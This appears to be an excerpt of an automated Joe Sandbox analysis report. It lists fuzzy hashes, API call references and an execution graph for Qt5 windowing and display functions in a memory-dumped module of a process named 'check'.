                                                                                                                                                                                                                • Opcode Fuzzy Hash: 46f76d0cdb2f54ed596c47a7961187234bede8d86bf7312b80ea52cd76aa292f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B2015E62E0D60286FB674B116882A3122A0AF177B2F45C0B3C43E8A1D0FF1D644957F5
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000E.00000002.2227853327.00007FFAFDF11000.00000020.00000001.01000000.00000048.sdmp, Offset: 00007FFAFDF10000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227790739.00007FFAFDF10000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227992094.00007FFAFDF27000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228129025.00007FFAFDF31000.00000004.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228170786.00007FFAFDF32000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffafdf10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Style$Option$?proxy@Button@@Option@@Style@@Tab@@V0@@
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3071743720-0
                                                                                                                                                                                                                • Opcode ID: 002c4c5a8730c91f6d81aaed243f6961d17e369199c58899c63822fae5c0ea75
                                                                                                                                                                                                                • Instruction ID: 031a36afac871b172db842a97f59fb2689002191bf67c940e73aee5773232d7f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 002c4c5a8730c91f6d81aaed243f6961d17e369199c58899c63822fae5c0ea75
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A1014C23608A8185E702CB64E8145ED7370FB8AB7AF404133CE6D576A8EF38D9CAC750
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00007FFAFDF25280: IsThemeActive.UXTHEME(?,?,?,?,00007FFAFDF11952), ref: 00007FFAFDF25288
                                                                                                                                                                                                                  • Part of subcall function 00007FFAFDF25280: IsAppThemed.UXTHEME(?,?,?,?,00007FFAFDF11952), ref: 00007FFAFDF25292
                                                                                                                                                                                                                  • Part of subcall function 00007FFAFDF25280: ?instance@QCoreApplication@@SAPEAV1@XZ.QT5CORE(?,?,?,?,00007FFAFDF11952), ref: 00007FFAFDF2529C
                                                                                                                                                                                                                  • Part of subcall function 00007FFAFDF25280: ?isDarkMode@QWindowsStylePrivate@@SA_NXZ.QT5WIDGETS(?,?,?,?,00007FFAFDF11952), ref: 00007FFAFDF252A7
                                                                                                                                                                                                                • ?pixelMetric@QWindowsStyle@@UEBAHW4PixelMetric@QStyle@@PEBVQStyleOption@@PEBVQWidget@@@Z.QT5WIDGETS ref: 00007FFAFDF17335
                                                                                                                                                                                                                • ?dpiScaled@QStyleHelper@@YANNPEBVQStyleOption@@@Z.QT5WIDGETS ref: 00007FFAFDF17388
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000E.00000002.2227853327.00007FFAFDF11000.00000020.00000001.01000000.00000048.sdmp, Offset: 00007FFAFDF10000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227790739.00007FFAFDF10000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227992094.00007FFAFDF27000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228129025.00007FFAFDF31000.00000004.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228170786.00007FFAFDF32000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffafdf10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Style$Metric@Style@@Windows$?dpi?instance@?pixelActiveApplication@@CoreDarkHelper@@Mode@Option@@Option@@@PixelPrivate@@Scaled@ThemeThemedWidget@@@
                                                                                                                                                                                                                • String ID: L
                                                                                                                                                                                                                • API String ID: 3883734864-2909332022
                                                                                                                                                                                                                • Opcode ID: 4f68c6cafcfac1b6bbd0a44f4701647fa2ce187a0b9f64dc5e316b9149a9fda3
                                                                                                                                                                                                                • Instruction ID: 35e7ec9fc630daf8a79aad4a39152c8a2f9a9ba0114fcd90419eb06e3d3da441
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4f68c6cafcfac1b6bbd0a44f4701647fa2ce187a0b9f64dc5e316b9149a9fda3
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1E118F11E1C242C5F7664716648487E6250AB47BE0F24813BED7D9B6D7EE1CE9C14790
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • ?qt_metacast@QBlendStyleAnimation@@UEAAPEAXPEBD@Z.QT5WIDGETS ref: 00007FFAFDF2558D
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000E.00000002.2227853327.00007FFAFDF11000.00000020.00000001.01000000.00000048.sdmp, Offset: 00007FFAFDF10000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227790739.00007FFAFDF10000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227992094.00007FFAFDF27000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228129025.00007FFAFDF31000.00000004.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228170786.00007FFAFDF32000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffafdf10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?qt_metacast@Animation@@BlendStyle
                                                                                                                                                                                                                • String ID: QWindowsVistaAnimation$QWindowsVistaTransition
                                                                                                                                                                                                                • API String ID: 1434549917-1652069576
                                                                                                                                                                                                                • Opcode ID: f9bb27d5a4cbf5a13fb69142f175957e5c890f340bd4d2ea051f7f17ee0b4355
                                                                                                                                                                                                                • Instruction ID: f20618d05bf102c4cc112aa4a0d2f0277b88a34f55d64874f0f4785077e27846
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f9bb27d5a4cbf5a13fb69142f175957e5c890f340bd4d2ea051f7f17ee0b4355
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0501DB44E1968704EF4B4B5A58115B019D26F977ABF48C13ADD7D4A3D4FD3C91044790

                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                Execution Coverage:44.4%
                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                Signature Coverage:3.4%
                                                                                                                                                                                                                Total number of Nodes:353
                                                                                                                                                                                                                Total number of Limit Nodes:50
                                                                                                                                                                                                                execution_graph 718 7ffafad11a3d 719 7ffafad11aa6 ?size@QImage@@QEBA?AVQSize@ 718->719 720 7ffafad11abc 718->720 719->720 721 7ffafad11c65 ?window@QPlatformBackingStore@@QEBAPEAVQWindow@ 720->721 722 7ffafad11af6 ?lcQpaBackingStore@@YAAEBVQLoggingCategory@ ?isDebugEnabled@QLoggingCategory@ 720->722 736 7ffafad11e71 720->736 725 7ffafad11c7d ?hasAlpha@QSurfaceFormat@ 721->725 722->721 723 7ffafad11b0d ?lcQpaBackingStore@@YAAEBVQLoggingCategory@ ?isDebugEnabled@QLoggingCategory@ 722->723 723->721 724 7ffafad11b24 723->724 726 7ffafad11b3b ?size@QImage@@QEBA?AVQSize@ 724->726 727 7ffafad11b2d 724->727 730 7ffafad11c8f 725->730 728 7ffafad11b4c 18 API calls 726->728 727->728 728->721 729 7ffafad11c9a ??1QSurfaceFormat@@QEAA ?toPixelFormat@QImage@@SA?AVQPixelFormat@@W4Format@1@ 731 7ffafad11cbc 729->731 730->729 732 7ffafad11d57 ?isEmpty@QRegion@ 731->732 731->736 733 7ffafad11d68 11 API calls 732->733 732->736 734 7ffafad11e1b 733->734 735 7ffafad11e5d ??1QPainter@@QEAA ??1QRegion@@QEAA 733->735 737 7ffafad11e20 ??0QRectF@@QEAA@AEBVQRect@@ ??0QRectF@@QEAA@AEBVQRect@@ ?drawImage@QPainter@@QEAAXAEBVQRectF@@AEBVQImage@@0V?$QFlags@W4ImageConversionFlag@Qt@@@@ 734->737 735->736 737->735 737->737 738 7ffafacffef0 739 7ffafacfff48 DefWindowProcW 738->739 740 7ffafacfff23 738->740 741 7ffafacfff41 739->741 740->739 740->741 742 7ffafacc9c70 GetSystemMetrics 743 7ffafacc9c87 742->743 744 7ffafacc9c8f GetSystemMetrics GetSystemMetrics 742->744 745 7ffafacc11e0 744->745 746 7ffafacc9cb8 ?isDebugEnabled@QLoggingCategory@ 745->746 747 7ffafacc9db9 746->747 748 7ffafacc9cc9 746->748 750 7ffafacc9dc3 ??0QTouchDevice@@QEAA ?setType@QTouchDevice@@QEAAXW4DeviceType@1@ ?type@QTouchDevice@@QEBA?AW4DeviceType@1 ?setCapabilities@QTouchDevice@@QEAAXV?$QFlags@W4CapabilityFlag@QTouchDevice@@@@ ?setMaximumTouchPoints@QTouchDevice@@QEAAXH 747->750 749 7ffafacc9cce 15 API calls 748->749 749->747 751 7ffafacb7370 GetForegroundWindow 752 7ffafacb7384 751->752 753 7ffafacb739a 751->753 752->753 754 7ffafacb738d IsChild 752->754 754->753 755 7ffafacbbf90 ?window@QPlatformWindow@@QEBAPEAVQWindow@ ?flags@QWindow@@QEBA?AV?$QFlags@W4WindowType@Qt@@@ ?type@QWindow@@QEBA?AW4WindowType@Qt@ ?isTopLevel@QWindow@ 756 7ffafacbbfff ?windowStates@QWindow@@QEBA?AV?$QFlags@W4WindowState@Qt@@@ 755->756 764 7ffafacbc027 755->764 758 7ffafacbc014 756->758 770 7ffafacbc04a 756->770 757 7ffafacbc0a9 ?property@QObject@@QEBA?AVQVariant@@PEBD 760 7ffafacbc0e9 ??1QVariant@@QEAA 757->760 761 7ffafacbc0c8 ?toBool@QVariant@ 757->761 762 7ffafacbc01d IsWindowVisible 758->762 758->764 759 7ffafacbc0e2 763 7ffafacbc0f4 ?windowStates@QWindow@@QEBA?AV?$QFlags@W4WindowState@Qt@@@ 759->763 760->763 761->760 765 7ffafacbc0d7 ??1QVariant@@QEAA 761->765 762->764 766 7ffafacbc107 763->766 767 7ffafacbc10e ShowWindow 763->767 764->757 764->759 765->759 766->767 768 7ffafacbc172 767->768 769 7ffafacbc126 GetWindowLongPtrW 767->769 771 7ffafacbc1a8 768->771 772 7ffafacbc177 GetWindowPlacement 768->772 775 7ffafacba7b0 769->775 770->764 776 7ffafacbc07e GetWindowLongPtrW 770->776 772->771 774 7ffafacbc195 SetWindowPlacement 772->774 774->771 777 7ffafacbc14e SetWindowPos 775->777 776->764 777->768 778 7ffafacbd450 779 7ffafacbd46c ??8QString@@QEBA_NVQLatin1String@@ 778->779 781 7ffafacbd4c9 ?createPlatformTheme@QPlatformIntegration@@UEBAPEAVQPlatformTheme@@AEBVQString@@ 779->781 782 7ffafacbd4ad 779->782 783 7ffafacddb00 ??0QPlatformTheme@@QEAA 781->783 782->783 784 7ffafacddb52 memset 783->784 785 7ffafacddb60 783->785 784->785 786 7ffafacddb73 memset 785->786 787 7ffafacddb7e 785->787 786->787 788 7ffafacbd510 ?type@QWindow@@QEBA?AW4WindowType@Qt@ 789 7ffafacbd545 788->789 790 7ffafacbd69a ?flags@QWindow@@QEBA?AV?$QFlags@W4WindowType@Qt@@@ ?isTopLevel@QWindow@ 788->790 794 7ffafacbd54d ??0QPlatformWindow@@QEAA@PEAVQWindow@@ GetDesktopWindow 789->794 791 7ffafacbd6db ?geometry@QWindow@@QEBA?AVQRect@ ?scaleAndOrigin@QHighDpiScaling@@SA?AUScaleAndOrigin@1@PEBVQWindow@@PEAVQPoint@@ 790->791 792 7ffafacbd71a ?geometry@QWindow@@QEBA?AVQRect@ ?scaleAndOrigin@QHighDpiScaling@@SA?AUScaleAndOrigin@1@PEBVQWindow@@PEAVQPoint@@ 790->792 793 7ffafacbd714 791->793 792->793 796 7ffafacbd756 ?property@QObject@@QEBA?AVQVariant@@PEBD 793->796 795 7ffafacc1660 2 API calls 794->795 797 7ffafacbd575 ?isDebugEnabled@QLoggingCategory@ 795->797 798 7ffafacbd77c 796->798 799 7ffafacbd7ca ?title@QWindow@@QEBA?AVQString@ 796->799 800 7ffafacbd692 797->800 801 7ffafacbd586 797->801 803 7ffafacbd781 ?userType@QVariant@ 798->803 802 7ffafacbd7e9 799->802 807 7ffafacc1660 2 API calls 801->807 824 7ffafacb36f0 ?property@QObject@@QEBA?AVQVariant@@PEBD 802->824 805 7ffafacbd7a2 ?convert@QVariant@@QEBA_NHPEAX 803->805 806 7ffafacbd797 ?constData@QVariant@ 803->806 809 7ffafacbd7bc 805->809 806->809 810 7ffafacbd59c 6 API calls 807->810 808 7ffafacbd7ff ??1QString@@QEAA ??1QString@@QEAA 855 7ffafacc1660 808->855 809->799 813 7ffafacbd623 7 API calls 810->813 812 7ffafacbd84a ?isDebugEnabled@QLoggingCategory@ 814 7ffafacbdab8 812->814 815 7ffafacbd85b 812->815 813->800 817 7ffafacbdb0c ??1QVariant@@QEAA 814->817 861 7ffafacb17d0 ??0QPlatformWindow@@QEAA@PEAVQWindow@@ 814->861 816 7ffafacc1660 2 API calls 815->816 818 7ffafacbd860 8 API calls 816->818 817->800 819 7ffafacb8210 818->819 821 7ffafacbd914 23 API calls 819->821 821->814 822 7ffafacbdae1 822->817 825 7ffafacb3766 ?userType@QVariant@ 824->825 826 7ffafacb37bf ?isTopLevel@QWindow@ 824->826 827 7ffafacb3798 ?convert@QVariant@@QEBA_NHPEAX 825->827 828 7ffafacb3780 ?constData@QVariant@ 825->828 829 7ffafacb37d6 ?layoutDirection@QGuiApplication@@SA?AW4LayoutDirection@Qt@ 826->829 827->829 828->829 831 7ffafacb3870 829->831 832 7ffafacb38f2 ?transientParent@QWindow@@QEBAPEAV1 831->832 833 7ffafacb38fa ?parent@QWindow@@QEBAPEAV1 831->833 840 7ffafacb3892 831->840 835 7ffafacb3900 832->835 833->835 834 7ffafacb3a2a ??1QVariant@@QEAA ??0QByteArray@@QEAA@AEBV0@ 921 7ffafacb3bd0 GetModuleHandleW 834->921 837 7ffafacb3905 ?mimeData@QDrag@@QEBAPEAVQMimeData@ 835->837 835->840 837->840 838 7ffafacb3a61 841 7ffafacb3b95 SetWindowPos 838->841 842 7ffafacb3aa1 838->842 849 7ffafacb3b7d 838->849 839 7ffafacb38d7 839->834 840->834 840->839 843 7ffafacb39d7 ?maximumSize@QWindow@@QEBA?AVQSize@ 840->843 841->849 844 7ffafacb3b02 SetWindowPos 842->844 847 7ffafacb3ab3 842->847 843->839 845 7ffafacb3b29 ??0QMessageLogger@@QEAA@PEBDH0 ?warning@QMessageLogger@ 844->845 846 7ffafacb3b4b 844->846 845->846 848 7ffafacb3b53 GetSystemMenu 846->848 846->849 850 7ffafacb3ab9 SetWindowPos 847->850 851 7ffafacb3adb 847->851 853 7ffafacb3b6c EnableMenuItem 848->853 849->808 850->846 851->846 852 7ffafacb3adf SetWindowPos 851->852 852->846 853->849 856 7ffafacc1689 855->856 857 7ffafacc1696 855->857 856->812 857->856 858 7ffafacc16ab ??0QLoggingCategory@@QEAA@PEBD 857->858 859 7ffafada2440 858->859 860 7ffafacc16ce _Init_thread_footer 859->860 860->812 862 7ffafacb1865 861->862 863 7ffafacb18c7 ?type@QWindow@@QEBA?AW4WindowType@Qt@ 862->863 864 7ffafacb1eb3 ?isTopLevel@QWindow@ 863->864 865 7ffafacb18d9 863->865 864->822 866 7ffafacb1917 ?window@QPlatformWindow@@QEBAPEAVQWindow@ ?isTopLevel@QWindow@ 865->866 867 7ffafacb190a ?openGLModuleType@QOpenGLContext@@SA?AW4OpenGLModuleType@1 865->867 869 7ffafacb1956 866->869 867->866 870 7ffafacb1961 ?qt_window_private@@YAPEAVQWindowPrivate@@PEAVQWindow@@ 869->870 871 7ffafacb1996 870->871 872 7ffafacb1abe ?window@QPlatformWindow@@QEBAPEAVQWindow@ ?window@QPlatformWindow@@QEBAPEAVQWindow@ ?mask@QWindow@@QEBA?AVQRegion@ ?scaleAndOrigin@QHighDpiScaling@@SA?AUScaleAndOrigin@1@PEBVQWindow@@PEAVQPoint@@ ?isActive@QHighDpiScaling@ 871->872 873 7ffafacc1660 2 API calls 871->873 874 7ffafacb1b20 ??0QRegion@@QEAA ?begin@QRegion@@QEBAPEBVQRect@ ?end@QRegion@@QEBAPEBVQRect@ 872->874 875 7ffafacb1b0e ??0QRegion@@QEAA@AEBV0@ 872->875 876 7ffafacb19bf ?isDebugEnabled@QLoggingCategory@ 873->876 878 7ffafacb1bb8 ??0QRegion@@QEAA@$$QEAV0@ ??1QRegion@@QEAA 874->878 879 7ffafacb1b47 874->879 877 7ffafacb1bd0 ?isEmpty@QRegion@ 875->877 880 7ffafacb19cc 876->880 900 7ffafacb1a20 876->900 882 7ffafacb1c03 ?begin@QRegion@@QEBAPEBVQRect@ ?end@QRegion@@QEBAPEBVQRect@ 877->882 883 7ffafacb1bee SetWindowRgn 877->883 878->877 881 7ffafacb1b50 ??0QRectF@@QEAA@AEBVQRect@@ ??0QRectF@@QEAA@AEBVQPointF@@AEBVQSizeF@@ ?toRect@QRectF@@QEBA?AVQRect@ ??YQRegion@@QEAAAEAV0@AEBVQRect@@ 879->881 886 7ffafacc1660 2 API calls 880->886 881->878 881->881 884 7ffafacb1c32 CreateRectRgn 882->884 885 7ffafacb1c2a 882->885 887 7ffafacb1d48 ??1QRegion@@QEAA ??1QRegion@@QEAA ?isTopLevel@QWindow@ 883->887 890 7ffafacb1ce7 ?window@QPlatformWindow@@QEBAPEAVQWindow@ ?isTopLevel@QWindow@ 884->890 891 7ffafacb1c5b 884->891 885->890 892 7ffafacb19d1 ??0QMessageLogger@@QEAA@PEBDH00 ?debug@QMessageLogger@@QEBA?AVQDebug@ ??6QDebug@@QEAAAEAV0@PEBD ??6QDebug@@QEAAAEAV0@N ??1QDebug@@QEAA 886->892 888 7ffafacb1e63 887->888 889 7ffafacb1d6d ?icon@QWindow@@QEBA?AVQIcon@ 887->889 898 7ffafacb1e74 ?property@QObject@@QEBA?AVQVariant@@PEBD ?toBool@QVariant@ 888->898 899 7ffafacb1e9c 888->899 893 7ffafacb1e59 ??1QIcon@@QEAA 889->893 894 7ffafacb1d87 889->894 896 7ffafacb1d05 OffsetRgn 890->896 897 7ffafacb1d28 SetWindowRgn 890->897 891->885 895 7ffafacb1c70 CreateRectRgn 891->895 892->900 893->888 901 7ffafacb1d93 DestroyIcon 894->901 902 7ffafacb1da0 894->902 895->891 903 7ffafacb1c91 CreateRectRgn CombineRgn 895->903 896->897 897->887 904 7ffafacb1d3f DeleteObject 897->904 898->899 899->864 906 7ffafacb1ea8 ??1QVariant@@QEAA 899->906 900->872 905 7ffafacb1a70 ?window@QPlatformWindow@@QEBAPEAVQWindow@ 900->905 901->902 907 7ffafacb1db9 GetSystemMetrics GetSystemMetrics 902->907 908 7ffafacb1dac DestroyIcon 902->908 909 7ffafacb1cc9 DeleteObject 903->909 910 7ffafacb1cbd DeleteObject 903->910 904->887 913 7ffafacb1a8b ?hasAlpha@QSurfaceFormat@ 905->913 906->864 912 7ffafacb4460 907->912 908->907 909->891 910->909 914 7ffafacb1dde GetSystemMetrics GetSystemMetrics 912->914 915 7ffafacbb420 913->915 916 7ffafacb1e0a 914->916 917 7ffafacb1ab4 ??1QSurfaceFormat@@QEAA 915->917 918 7ffafacb1e38 SendMessageW 916->918 919 7ffafacb1e29 SendMessageW 916->919 917->872 920 7ffafacb1e45 SendMessageW 918->920 919->920 920->893 922 7ffafacb3c61 921->922 923 7ffafacb3c70 ?initialGeometry@QPlatformWindow@@SA?AVQRect@@PEBVQWindow@@AEBV2@HHPEAPEBVQScreen@@ 922->923 924 7ffafacb3cf8 ?utf16@QString@ ?utf16@QString@ 923->924 925 7ffafacb3cac 923->925 930 7ffafacb3d20 924->930 925->924 926 7ffafacb3cd5 ?objectName@QObject@@QEBA?AVQString@ ??4QUrl@@QEAAAEAV0@$$QEAV0@ 925->926 927 7ffafacb3cb9 ?qAppName@@YA?AVQString@ ??4QUrl@@QEAAAEAV0@$$QEAV0@ 925->927 928 7ffafacb3cf2 ??1QString@@QEAA 926->928 927->928 928->924 929 7ffafacb3e16 ?qt_window_private@@YAPEAVQWindowPrivate@@PEAVQWindow@@ 932 7ffafacb3e28 929->932 930->929 930->932 931 7ffafacc1660 2 API calls 933 7ffafacb3e71 ?isDebugEnabled@QLoggingCategory@ 931->933 932->931 934 7ffafacb3e82 933->934 935 7ffafacb4088 933->935 936 7ffafacc1660 2 API calls 934->936 937 7ffafacb40a1 ?isTopLevel@QWindow@ 935->937 938 7ffafacb3e8c 9 API calls 936->938 939 7ffafacb40b3 GetWindowLongPtrW 937->939 940 7ffafacb40e9 937->940 941 7ffafacb1f50 938->941 939->940 942 7ffafacb40c8 GetClientRect 939->942 943 7ffafacb4114 CreateWindowExW 940->943 944 7ffafacb3f4a 20 API calls 941->944 942->940 942->943 945 7ffafacc1660 2 API calls 943->945 944->935 946 7ffafacb4176 ?isDebugEnabled@QLoggingCategory@ 945->946 947 7ffafacb4187 946->947 948 7ffafacb42c0 946->948 949 7ffafacc1660 2 API calls 947->949 950 7ffafacb42c5 ?qErrnoWarning@ 948->950 952 7ffafacb4311 948->952 951 7ffafacb419d 15 API calls 949->951 957 7ffafacb43eb 950->957 951->948 954 7ffafacb434e 952->954 958 7ffafacb432c ?isTopLevel@QWindow@ 952->958 953 7ffafacb441b ??1QString@@QEAA ??1QString@@QEAA 955 7ffafacb4440 953->955 956 7ffafacb436e ??0QRect@@QEAA@AEBVQPoint@@AEBVQSize@@ 954->956 955->838 956->957 957->953 958->954 959 7ffafacb4339 ?flags@QWindow@@QEBA?AV?$QFlags@W4WindowType@Qt@@@ 958->959 959->954 960 7ffafacc5570 ?sharedNull@QArrayData@@SAPEAU1 EnumDisplayMonitors 968 7ffafacc55c7 960->968 961 7ffafacc5630 ??8@YA_NAEBVQString@@0 961->968 962 7ffafacc5881 964 7ffafacc591d 962->964 965 7ffafacc58f5 ??1QString@@QEAA 962->965 966 7ffafacc590b ?deallocate@QArrayData@@SAXPEAU1@_K1 962->966 963 7ffafacc5666 ??0QPlatformScreen@@QEAA 963->968 965->965 965->966 966->964 967 7ffafacc5830 ??8@YA_NAEBVQString@@0 969 7ffafacc57d3 967->969 968->961 968->963 968->969 970 7ffafacc570d ?handleScreenAdded@QWindowSystemInterface@@SAXPEAVQPlatformScreen@@_N 968->970 973 7ffafacc1660 2 API calls 968->973 975 7ffafacc57ad ??1QDebug@@QEAA ??1QDebug@@QEAA 968->975 969->962 969->967 971 7ffafacc1660 2 API calls 970->971 972 7ffafacc573b ?isDebugEnabled@QLoggingCategory@ 971->972 972->968 974 7ffafacc574d ??0QMessageLogger@@QEAA@PEBDH00 ?debug@QMessageLogger@@QEBA?AVQDebug@ ??6QDebug@@QEAAAEAV0@PEBD 973->974 974->968 975->968 976 7ffafacbd0d0 977 7ffafacbd0de 976->977 978 7ffafad12d20 ??0QEventDispatcherWin32@@QEAA@PEAVQObject@@ ?setObjectName@QObject@@QEAAXAEBVQString@@ ??1QString@@QEAA ?createInternalHwnd@QEventDispatcherWin32@ 977->978 979 7ffafacbb270 980 7ffafacbb369 979->980 981 7ffafacbb28b 979->981 982 7ffafacbb2ab 981->982 983 7ffafacbb29e DestroyIcon 981->983 984 7ffafacbb2c4 GetSystemMetrics GetSystemMetrics 982->984 985 7ffafacbb2b7 DestroyIcon 982->985 983->982 986 7ffafacb4460 984->986 985->984 987 7ffafacbb2e9 GetSystemMetrics GetSystemMetrics 986->987 988 7ffafacbb315 987->988 989 7ffafacbb339 SendMessageW 988->989 990 7ffafacbb348 SendMessageW 988->990 991 7ffafacbb355 SendMessageW 989->991 990->991 991->980 992 7ffafacbe0a3 ?requested@QPlatformInputContextFactory@@SA?AVQString@ ?isNull@QString@ 993 7ffafacbe0fb ?create@QPlatformInputContextFactory@@SAPEAVQPlatformInputContext@@AEBVQString@@ 992->993 995 7ffafacbe0e7 992->995 994 7ffafacbe0f9 ??1QString@@QEAA 993->994 998 7ffafacdb130 7 API calls 995->998 999 7ffafada208c 998->999 1000 7ffafacdb1ff ?connectImpl@QObject@@CA?AVConnection@QMetaObject@@PEBV1@PEAPEAX01PEAVQSlotObjectBase@QtPrivate@@W4ConnectionType@Qt@@PEBHPEBU3@ ??1Connection@QMetaObject@@QEAA 999->1000 1000->994 1001 7ffafacf2b80 8 API calls 1002 7ffafacf2c58 1001->1002 1003 7ffafacf2c43 GetProcAddress 1001->1003 1004 7ffafacf2c85 ??0QByteArray@@QEAA@$$QEAV0@ ??0QByteArray@@QEAA@$$QEAV0@ ??0QByteArray@@QEAA@$$QEAV0@ 1002->1004 1011 7ffafacf2d59 1002->1011 1003->1002 1005 7ffafacf2ce9 1004->1005 1006 7ffafacf2cef ??1QString@@QEAA ??1QString@@QEAA ??1QByteArray@@QEAA ??1QByteArray@@QEAA 1004->1006 1005->1006 1012 7ffafacf2fe2 1006->1012 1013 7ffafacf2d2a 1006->1013 1007 7ffafacf2f0b ??0QByteArray@@QEAA@$$QEAV0@ ??0QByteArray@@QEAA@$$QEAV0@ ??0QByteArray@@QEAA@$$QEAV0@ 1009 7ffafacf2f75 ??1QString@@QEAA ??1QString@@QEAA ??1QByteArray@@QEAA ??1QByteArray@@QEAA 1007->1009 1010 7ffafacf2f6f 1007->1010 1008 7ffafacf2fcf ?deallocate@QArrayData@@SAXPEAU1@_K1 1008->1012 1009->1012 1009->1013 1010->1009 1011->1007 1014 7ffafacf2d89 6 API calls 1011->1014 1013->1008 1013->1012 1016 7ffafacf2e0d 1014->1016 1015 7ffafacf2e87 1015->1007 1016->1007 1016->1015 1017 7ffafacf2e9a EnumDisplayDevicesW 1016->1017 1017->1015 1018 7ffafacf2eb6 1017->1018 1019 7ffafacf2ed8 ?fromWCharArray@QString@@SA?AV1@PEB_WH ??4QUrl@@QEAAAEAV0@$$QEAV0@ ??1QString@@QEAA 1018->1019 1020 7ffafacf2ebf EnumDisplayDevicesW 1018->1020 1019->1015 1020->1015 1020->1018 1021 7ffafacff900 1022 7ffafacff90e 1021->1022 1034 7ffafacbfb80 1022->1034 1024 7ffafacff93d ??1QString@@QEAA 1025 7ffafacff958 1024->1025 1026 7ffafacff981 1024->1026 1025->1026 1030 7ffafacff974 ?qErrnoWarning@ 1025->1030 1027 7ffafacff987 SetClipboardViewer 1026->1027 1028 7ffafacff995 1026->1028 1027->1028 1029 7ffafacff99a ?isDebugEnabled@QLoggingCategory@ 1028->1029 1031 7ffafacffa4c 1029->1031 1032 7ffafacff9ab 1029->1032 1030->1026 1033 7ffafacff9b0 10 API calls 1032->1033 1033->1031 1035 7ffafacbf730 1034->1035 1036 7ffafacbfbb3 ??0QByteArray@@QEAA@AEBV0@ ?append@QString@@QEAAAEAV1@AEBV1@ 1035->1036 1037 7ffafacc1ba0 1036->1037 1038 7ffafacbfbff ??1QString@@QEAA GetModuleHandleW ?utf16@QString@ CreateWindowExW ??1QString@@QEAA 1037->1038 1038->1024 1039 7ffafacbbe40 ?formatWindowTitle@QPlatformWindow@@KA?AVQString@@AEBV2@0 ??1QString@@QEAA 1040 7ffafacbbe90 1039->1040 1041 7ffafacbbe7d ??1QString@@QEAA 1040->1041 1042 7ffafacc60a0 ??0?$QVector@VQPointF@@@@QEAA 1054 7ffafacc5cc0 GetMonitorInfoW 1042->1054 1044 7ffafacc6132 1045 7ffafacc62dc ??1QString@@QEAA 1044->1045 1046 7ffafacc6145 1044->1046 1047 7ffafacc619e 1044->1047 1050 7ffafacc6158 ?allocate@QArrayData@@SAPEAU1@_K00V?$QFlags@W4AllocationOption@QArrayData@@@@ 1046->1050 1051 7ffafacc6171 1046->1051 1048 7ffafacc622a ??0QByteArray@@QEAA@AEBV0@ 1047->1048 1049 7ffafacc61bb ??0QByteArray@@QEAA@AEBV0@ 1047->1049 1052 7ffafacc6293 1048->1052 1049->1051 1050->1051 1051->1045 1053 7ffafacc62c4 ??1QString@@QEAA 1052->1053 1053->1051 1055 7ffafacc5e3f 1054->1055 1056 7ffafacc5d21 ?fromWCharArray@QString@@SA?AV1@PEB_WH ??4QUrl@@QEAAAEAV0@$$QEAV0@ ??1QString@@QEAA ?isNull@QString@ 1054->1056 1055->1044 1057 7ffafacc5dea 1056->1057 1058 7ffafacc5dee ?constData@QString@@QEBAPEBVQChar@ 1056->1058 1059 7ffafacc5e48 CreateDCW 1057->1059 1060 7ffafacc5e0f ?compareStrings@QtPrivate@@YAHVQStringView@@0W4CaseSensitivity@Qt@@ 1057->1060 1058->1057 1061 7ffafacc5f9f 7 API calls 1059->1061 1062 7ffafacc5e6e 1059->1062 1060->1055 1060->1059 1061->1055 1063 7ffafacc5eda GetDeviceCaps GetDeviceCaps 1062->1063 1067 7ffafacc5ece 1062->1067 1064 7ffafacc5f12 GetDeviceCaps GetDeviceCaps GetDeviceCaps GetDeviceCaps 1063->1064 1065 7ffafacc5f94 DeleteDC 1064->1065 1066 7ffafacc5f87 1064->1066 1065->1055 1066->1065 